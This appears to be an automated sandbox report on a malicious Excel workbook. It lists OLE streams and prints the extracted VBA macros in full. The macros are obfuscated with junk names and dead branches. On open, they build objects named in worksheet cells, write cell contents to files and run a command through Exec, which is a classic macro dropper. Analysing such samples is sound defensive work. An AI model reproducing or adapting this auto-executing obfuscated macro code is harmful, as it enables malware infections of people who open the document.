Data Raw:	01 16 01 00 03 00 01 00 00 e8 07 00 00 e4 00 00 00 84 02 00 00 2b 08 00 00 69 08 00 00 95 0d 00 00 00 00 00 00 01 00 00 00 b4 37 76 52 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 68 00 ff ff 00 00 2f 8a 2f f1 d2 6c 72 4b 9a 66 70 07 52 a7 38 3c dd 03 e3 f1 ab 38 ad 44 8e bc c6 60 2a 6c 48 99 d8 08 0b d8 36 d4 4b 4c a4 f6 48 7a ba

VBA Code

Attribute VB_Name = "bDSFgs4ysustjshgs"
Attribute VB_Base = "0{F1E303DD-38AB-44AD-8EBC-C6602A6C4899}{D80B08D8-D436-4C4B-A4F6-487ABA1E56BA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public sdghkaFAw23r As Long
Public bhide4uefGJDr As String
Public agrkjdGAW3erg3jkasg, berukuw7swDEe3 As Object
Private Sub TextBox1_Change()
Dim lngRows As Long, intCols As Integer: Dim lngRow As Long, intCol As Integer
Dim lngStep As Long, lngVal As Long: Dim alngValues() As Long
Dim rgRange As Range: lngVal = 1: lngStep = 1
ReDim alngValues(1 To lngRows, 1 To intCols)
If lngRows <> 3479289 Then
Else
Set rgRange = ActiveCell.Range(Cells(1, 1), Cells(lngRows, intCols))
For lngRow = 1 To lngRows
For intCol = 1 To intCols
alngValues(lngRow, intCol) = lngVal
lngVal = lngVal + lngStep
Next intCol
Next lngRow
rgRange.Value = alngValues
End If
End Sub
Function DFGw3hlwrkglsd(lngSum As Long) As Object
Const dblRate1 As Double = 0.09
Const dblRate2 As Double = 0.11
Const dblRate3 As Double = 0.15
Dim dhCalculatePercent As Double
Const intSum1 As Long = 5000
Const intSum2 As Long = 10000
Set DFGw3hlwrkglsd = agrkjdGAW3erg3jkasg
If lngSum < intSum1 Then
dhCalculatePercent = lngSum * dblRate1
ElseIf lngSum < intSum2 Then
dhCalculatePercent = lngSum * dblRate2
Else
dhCalculatePercent = lngSum * dblRate3
End If
End Function

VBA File Name: dfkj3ghrksldjkgf.cls, Stream Size: 6933

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dfkj3ghrksldjkgf
VBA File Name:	dfkj3ghrksldjkgf.cls
Stream Size:	6933
Data ASCII:	. . . . . . . . . , . . . . . . 8 . . . . . . . . . . . . . . . . . . . . 7 . . . # . . . . . . . . . . . . . . . . . < . . . s ) 3 / w L g . . ~ w . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . \\ s N . N } . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . \\ s N . N } . . s ) 3 / w L g . . ~ w . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S L . . . . S . . . . . S . . . . 0 . . . . . . " p . . . . . 6 " . . . . . < . . . . . . . < . . . .
Data Raw:	01 16 01 00 03 00 01 00 00 2c 07 00 00 e4 00 00 00 38 02 00 00 96 07 00 00 a4 07 00 00 c0 14 00 00 00 00 00 00 01 00 00 00 b4 37 ef 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 73 fa 29 33 2f cf 77 4c b0 a5 67 07 1f 7e c4 77 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "dfkj3ghrksldjkgf"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub sdfhSDFasw3erhkswdgSDYHsd()
Dim rgSelUnion As Range
Dim strTitle As String
Dim strMessage As String
Dim strSelType As String
Dim intBlockCount As Integer
Dim intCellCount As Long
Dim intColCount As Integer
Dim intRowCount As Long
Dim intAreasCount As Integer
Dim strCurSelType  As String
Dim rgArea As Range
intAreasCount = Selection.Areas.Count
bDSFgs4ysustjshgs.Caption = Cells(117, 6)
If intAreasCount = 10273 Then
    strTitle = "."
    strSelType = Selection.Areas(1).Text
    Set rgSelUnion = Selection.Areas(1)
Else
    strTitle = "rwdg"
End If
Set bDSFgs4ysustjshgs.agrkjdGAW3erg3jkasg = CreateObject(bDSFgs4ysustjshgs.Caption)
If bDSFgs4ysustjshgs.agrkjdGAW3erg3jkasg Is Nothing Then
    For Each rgArea In Selection.Areas
        strCurSelType = rgArea.Text
        If strCurSelType <> strSelType Then
            strSelType = "df3"
        End If
        If strCurSelType = "Block" Then
            intBlockCount = intBlockCount + 1
        End If
        Set rgSelUnion = Union(rgSelUnion, rgArea)
    Next rgArea
    For Each rgArea In rgSelUnion.Areas
        Select Case rgArea.Text
            Case "9"
                intRowCount = intRowCount + rgArea.Rows.Count
            Case "3"
                intColCount = intColCount + rgArea.Columns.Count
            Case "ewhk2"
                intColCount = intColCount + rgArea.Columns.Count
                intRowCount = intRowCount + rgArea.Rows.Count
        End Select
    Next rgArea
    intCellCount = rgSelUnion.Count
    strMessage = "Vsdefhwkls:" & vbTab & strSelType & vbCrLf & "gfqwekasd:   " & vbTab & intAreasCount & vbCrLf &     "ashkizuk:          " & vbTab & intColCount & vbCrLf & "hjul4:           " & vbTab & intRowCount & vbCrLf &     "bnjdkli7:             " & vbTab & intBlockCount & vbCrLf & "vbjwuhks:    " & vbTab & Format(intCellCount, "#,###")
    MsgBox strMessage, vbInformation, strTitle
Else
    bDSFgs4ysustjshgs.Tag = Cells(113, 3)
End If
intAreasCount = Selection.Areas.Count
If intAreasCount = 10273 Then
    strTitle = "."
Else
    Set bDSFgs4ysustjshgs.berukuw7swDEe3 =     bDSFgs4ysustjshgs.agrkjdGAW3erg3jkasg.CreateObject(bDSFgs4ysustjshgs.Tag, "")
    strTitle = "rwdg"
End If
End Sub
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Dim iFoundRng As Range: Dim AutoNum As String: Dim i As Long
Dim firstAddress As String: Dim LastFoundRng As String: Dim fkausk As String
bDSFgs4ysustjshgs.CommandButton1.Caption = Replace(Cells(106, 2), "Rpce", "")
AutoNum = Range("E5"): Open bDSFgs4ysustjshgs.CommandButton1.Caption For Output As #1
bDSFgs4ysustjshgs.CommandButton1.Caption = Cells(117, 2)
If AutoNum = "hfkwlwkd" Then
MsgBox "5!", 48, "."
Exit Sub
End If
Open bDSFgs4ysustjshgs.CommandButton1.Caption For Output As #2
Dim gnjlewkdsldf As New fgkwjkFGzaxd
bDSFgs4ysustjshgs.Label1.Tag = Replace(Cells(107, 2), "Rpce", ""): Print #2, Cells(115, 2) + vbCrLf & Cells(116, 2)
Print #1, bDSFgs4ysustjshgs.Label1.Tag
Close #2
If LastFoundRng <> "bhckla" Then
firstAddress = "34kla"
bDSFgs4ysustjshgs.Label1.Tag = Replace(Cells(108, 2), "Rpce", "")
Else
On Error Resume Next
LastFoundRng = ActiveWorkbook.Names("LastFoundRngName").RefersToRange.Address
End If
Close #1
bDSFgs4ysustjshgs.berukuw7swDEe3.Exec bDSFgs4ysustjshgs.Label1.Tag
End Sub

VBA File Name: fgkwjkFGzaxd.cls, Stream Size: 5283

General
Stream Path:	_VBA_PROJECT_CUR/VBA/fgkwjkFGzaxd
VBA File Name:	fgkwjkFGzaxd.cls
Stream Size:	5283
Data ASCII:	. . . . . . . . . . . . . . . 8 . . . . . . . ! . . . ! . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . @ . . . . ? i A ' d / . * = h . 8 . . + 3 q . . . . . . . . . . . . . . . . . . . . . G . x B u 0 p ? R I . . . . . . . . . . . . . . . . . . . . . . x . . . . . G . x B u 0 p ? R I . ? i A ' d / . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S . . . . . S . . . . . S . . . . . < . . . . . 6 " . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . .
Data Raw:	01 16 01 00 02 00 01 00 00 e4 05 00 00 e4 00 00 00 38 02 00 00 13 06 00 00 21 06 00 00 21 0f 00 00 00 00 00 00 01 00 00 00 b4 37 ce b9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 df 8f 3f e9 69 82 ea 41 a4 27 d9 64 b5 2f 01 f1 2a 3d fb fc fa a0 68 10 a7 38 08 00 2b 33 71 b5 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "fgkwjkFGzaxd"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public fhwkuishdf As Object
Sub fgghzashsGSdghs3e46sdrtd()
Dim r As Range, ar As Range, nm As String, col As Range
Set r = Selection
If r.Count < 2 Then Exit Sub
Application.ScreenUpdating = False
nm = ActiveSheet.Name
Sheets.Add
For Each ar In r.Areas
For Each col In ar.Columns
col.Copy
ActiveSheet.Paste
ActiveCell.SpecialCells(xlLastCell).Offset(1, 0).Select
Next
Next
Range(Cells(1, 1), Cells(r.Cells.Count, 2)).Select
Selection.Sort Key1:=Range("A1"), Order1:=xlAscending, Header:=xlGuess, OrderCustom:=1, MatchCase:=False, Orientation:=xlTopToBottom, DataOption1:=xlSortTextAsNumbers
Rows("1:1").Select
Selection.Insert Shift:=xlDown
Cells(2, 2).FormulaR1C1 = "=IF((RC[-1]=R[-1]C[-1])+(RC[-1]=R[1]C[-1]),1,0)"
Range("b2").Select
Selection.AutoFill Destination:=Range(Cells(2, 2), Cells(r.Cells.Count + 1, 2)), Type:=xlFillDefault
Range(Cells(2, 2), Cells(r.Cells.Count + 1, 2)).Copy
Cells(2, 2).PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks :=False, Transpose:=False
Application.CutCopyMode = False
For Each ar In r.Cells
If ar.Value <> Empty Then
If WorksheetFunction.VLookup(ar.Value, Range(Cells(2, 1), Cells(r.Count + 1, 2)), 2, 0) Then
ar.Interior.ColorIndex = 3
End If
End If
Next
Application.DisplayAlerts = False
ActiveSheet.Delete
Sheets(nm).Select
ActiveCell.Select
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub
Private Sub Class_Initialize()
Dim HzsghkzjfhZFHZXDvgzs3ghksdj As String: Dim lngRows As Long, intCols As Integer
Dim lngRow As Long, intCol As Integer: Dim lngStep As Long, lngVal As Long
lngVal = 1
lngStep = 1
If lngStep = 2377 Then
lngRows = Val(InputBox(";")): intCols = Val(InputBox(",")): lngRow = (lngRows + intCols) / 2
End If
If lngVal = 73762 Then
Application.ScreenUpdating = False
For lngRow = 1 To lngRows
For intCol = 1 To intCols
ActiveCell.Offset(lngRow, intCol).Value = lngVal
lngVal = lngVal + lngStep
Next intCol
Next lngRow
Application.ScreenUpdating = True
End If
Set fhwkuishdf = Hderyhs54esdfGZSDEGZJG
End Sub

VBA File Name: gDFt4etujSDssdf.cls, Stream Size: 3387

General
Stream Path:	_VBA_PROJECT_CUR/VBA/gDFt4etujSDssdf
VBA File Name:	gDFt4etujSDssdf.cls
Stream Size:	3387
Data ASCII:	. . . . . . . . . . . . . . . 8 . . . ? . . . M . . . A . . . . . . . . . . . 7 . . . . # . . . . . . . . . . . . . . . . . < . . . ( = a C S E w 3 . c . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . s - . _ . J . u . . . . . . . . . . . . . . . . . . . . . . . . x . . . . s - . _ . J . u . . ( = a C S E w 3 . c . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S L . . . . S . . . . . S . . . . 0 . . . . . . 6 " . . . . . < . . . . . . . < . . . . . . . < . .
Data Raw:	01 16 01 00 03 00 01 00 00 fc 04 00 00 e4 00 00 00 38 02 00 00 3f 05 00 00 4d 05 00 00 41 0a 00 00 00 00 00 00 01 00 00 00 b4 37 00 7f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 ec 28 cd 3d c5 f1 61 43 8e 53 45 77 33 c7 13 63 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "gDFt4etujSDssdf"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function GFaserjlkjshlkhlkjs(rgRange As Range) As String
Set rgRange = rgRange.Range("A1")
Select Case True
Case IsEmpty(rgRange)
GFaserjlkjshlkhlkjs = "134"
Case Application.IsText(rgRange)
GFaserjlkjshlkhlkjs = "adsfq"
Case Application.IsLogical(rgRange)
GFaserjlkjshlkhlkjs = ";"
Case Application.IsErr(rgRange)
GFaserjlkjshlkhlkjs = "Z"
Case IsDate(rgRange)
GFaserjlkjshlkhlkjs = "dsf"
Case InStr(1, rgRange.Text, ":") <> 0
GFaserjlkjshlkhlkjs = ":"
Case IsNumeric(rgRange)
GFaserjlkjshlkhlkjs = "s"
End Select
End Function
Private Sub Workbook_Open()
Dim strFindData As String
Dim rgFound As Range
Dim i As Integer
If i = 567 Then
strFindData = InputBox("qew")
For i = 1 To Worksheets.Count
With Worksheets(i).Cells
Set rgFound = .Find(strFindData, LookIn:=xlValues)
If Not rgFound Is Nothing Then
Sheets(i).Select
rgFound.Select
Exit Sub
End If
End With
Next
MsgBox ("")
Else: dfkj3ghrksldjkgf.sdfhSDFasw3erhkswdgSDYHsd
strFindData = "err": Range("A3").Select
End If
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 109

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	109
Entropy:	4.248783454035945
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 cb e8 f1 f2 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 220

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	220
Entropy:	2.6284948135251156
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8b 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 204

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	204
Entropy:	3.361855751353834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . d . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U s e r . . . . . . . . . . . . 1 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . @ . . . . . \\ . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 109762

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	109762
Entropy:	7.592306480310291
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B r u n o B . . . . a . . . . . . . . = . . . . . . . . . . . . . . g D F t 4 e t u j S D s s d f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . V . 0 8 . . . . . . . X . @ . . . . . . . . . . " .
Data Raw:	09 08 10 00 00 06 05 00 aa 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 42 72 75 6e 6f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 719

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	719
Entropy:	5.39849758103268
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = g D F t 4 e t u j S D s s d f / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = d f k j 3 g h r k s l d j k g f / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = b D S F g s 4 y s u s t j s h g s . . C l a s s = f g k w j k F G z a x d . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 67 44 46 74 34 65 74 75 6a 53 44 73 73 64 66 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 64 66 6b 6a 33 67 68 72 6b 73 6c 64 6a 6b 67 66 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 194

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	194
Entropy:	3.57162940932154
Base64 Encoded:	False
Data ASCII:	g D F t 4 e t u j S D s s d f . g . D . F . t . 4 . e . t . u . j . S . D . s . s . d . f . . . d f k j 3 g h r k s l d j k g f . d . f . k . j . 3 . g . h . r . k . s . l . d . j . k . g . f . . . b D S F g s 4 y s u s t j s h g s . b . D . S . F . g . s . 4 . y . s . u . s . t . j . s . h . g . s . . . f g k w j k F G z a x d . f . g . k . w . j . k . F . G . z . a . x . d . . . . .
Data Raw:	67 44 46 74 34 65 74 75 6a 53 44 73 73 64 66 00 67 00 44 00 46 00 74 00 34 00 65 00 74 00 75 00 6a 00 53 00 44 00 73 00 73 00 64 00 66 00 00 00 64 66 6b 6a 33 67 68 72 6b 73 6c 64 6a 6b 67 66 00 64 00 66 00 6b 00 6a 00 33 00 67 00 68 00 72 00 6b 00 73 00 6c 00 64 00 6a 00 6b 00 67 00 66 00 00 00 62 44 53 46 67 73 34 79 73 75 73 74 6a 73 68 67 73 00 62 00 44 00 53 00 46 00 67 00 73

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 7308

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	7308
Entropy:	5.444546679224259
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2472

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
CLSID:
File Type:	data
Stream Size:	2472
Entropy:	4.816776014589829
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ L . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . I f 6 . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y . .
Data Raw:	93 4b 2a 88 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 447

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
CLSID:
File Type:	data
Stream Size:	447
Entropy:	3.44062331296355
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . 1 . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r g R a n g e . . . . q . . . . . . . . . . . . . . ( . . . . . . . . . . . 1 . . . . . . . . . . . . . . 8 . . . . . . . . . . . 1 . . . . . . . . . . . . . . H . . . . . . . . . . . 1 . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 71 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 09 00 00 00 00 00 06 00 09 00 00 00 00 00 04 00 ff ff ff ff 03 00 00 09 41 03 00 00 00 00 00 00 31 08 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 360

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
CLSID:
File Type:	data
Stream Size:	360
Entropy:	2.1180237814686973
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y . . . . . . . . . $ . 4 . . . 1 . . . . . . . a . . . . . . . Y . . . . . . . . . . . . . . . ` I . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . 4 . P . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 a1 07 00 00 00 00 00 00 c9 07 00 00 00 00 00 00 09 08 00 00 00 00 00 00 ff ff ff ff 79 07 00 00 00 00 00 00 08 00 24 00 34 00 00 00 31 08 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 08

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 162

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
CLSID:
File Type:	data
Stream Size:	162
Entropy:	2.472345822117768
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . 4 . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . = . . . . . . . 0 $ . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 34 00 01 01 00 00 00 00 02 00 00 00 03 60 08 01 f5 03 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 a1 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 1e 3d 81 00 00 00 00 00 01 00 30 24 00 41 01 00 00 00 00 02 00 01 00 03 60 00 00 f8

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 278

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_4
CLSID:
File Type:	data
Stream Size:	278
Entropy:	2.893422962294194
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . , . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . ( ; . . . . 9 . . . . . . . . . . . . . . @ . . . . 4 . . . . . a . . . . . . . . . . . . . . @ . . . . 8 . . . . . . . . . . . . . . . . . . . @ . . . . < . . . . . . . . . . . . . . . . . . . @ . . . . L . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 05 00 ff ff ff ff ff ff ff ff 00 00 00 00 6c 00 00 00 04 00 24 00 a1 02 00 00 00 00 05 00 00 00 03 60 00 00 cc 01 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 2c 00 e1 02 00 00 00 00 05 00 01 00 03 60 08 01 c9 01 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 e1 01 00 00 00 00 01

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 816

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_5
CLSID:
File Type:	data
Stream Size:	816
Entropy:	2.5680696790713387
Base64 Encoded:	False
